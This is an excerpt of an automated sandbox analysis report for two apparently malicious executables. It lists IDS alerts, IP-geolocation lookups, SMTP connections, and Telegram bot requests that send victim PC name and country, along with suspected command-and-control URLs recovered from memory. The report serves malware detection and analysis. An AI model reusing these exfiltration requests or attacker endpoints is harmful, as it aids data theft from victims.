                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49727 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49734 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49756 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 104.21.80.1:443
                  Source: global trafficTCP traffic: 192.168.2.5:49763 -> 94.199.206.214:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49722 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49729 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2020:19:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2019:30:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.okurkardesler.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 13:44:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 13:44:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003475000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003475000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003485000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003312000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.okurkardesler.com
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003475000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003485000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003312000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://okurkardesler.com
                  Source: 7495 P.exe, 00000002.00000002.1340523019.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1376684346.0000000002592000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20a
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003419000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enP
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003414000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003165000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003300000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003190000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000344A000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
